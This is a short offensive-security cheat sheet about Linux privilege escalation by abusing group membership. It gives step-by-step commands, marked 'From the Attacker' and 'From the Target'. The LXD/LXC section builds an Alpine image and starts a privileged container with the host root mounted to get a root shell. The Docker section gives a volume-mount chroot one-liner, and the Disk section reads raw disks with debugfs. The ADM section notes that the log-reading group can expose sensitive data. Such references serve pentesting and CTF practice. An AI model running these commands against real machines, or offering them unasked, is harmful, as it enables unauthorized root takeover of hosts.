PRIMARY CATEGORY → LINUX PRIVESC
Enumeration
id
groups "$USER"LXC | LXD
Manual Exploitation
Downloading the Build Alpine
From the Attacker ⚔️
curl --silent --location --request GET 'https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine' --remote-nameBuilding Alpine
From the Attacker ⚔️
bash ./build-alpineCreating the Container
lxd initlxc image import <ALPINE_TAR_GZ> --alias alpinelxc init alpine privesc -c security.privileged=truelxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=truelxc start privesclxc exec privesc sh # Or lxc exec privesc /bin/bashExploitDB
Downloading the Build Alpine
From the Attacker ⚔️
curl --silent --location --request GET 'https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine' --remote-nameBuilding Alpine
From the Attacker ⚔️
bash ./build-alpineRunning the Exploit
From the Target 🎯
bash script.bashOnce inside the container, just go to /mnt/root to see all resources from the host machine
Docker
If the current user belongs to the docker group, we can spawn new docker containers and compromise the entire machine using volumes by mounting the system root / on the container’s /mnt directory
docker run -v /:/mnt --rm -it ubuntu chroot /mnt shDisk
Members of this group have full access to any existing device within /dev, which means that file system permissions are ignored, so we can read the entire file system from the raw disk
To do so, we use debugfs
debugfs <DISK> # debugfs /dev/sda1ADM
Users belonging to this group can read all logs stored within /var/log/ directory, so an attacker could gather sensitive data stored in log files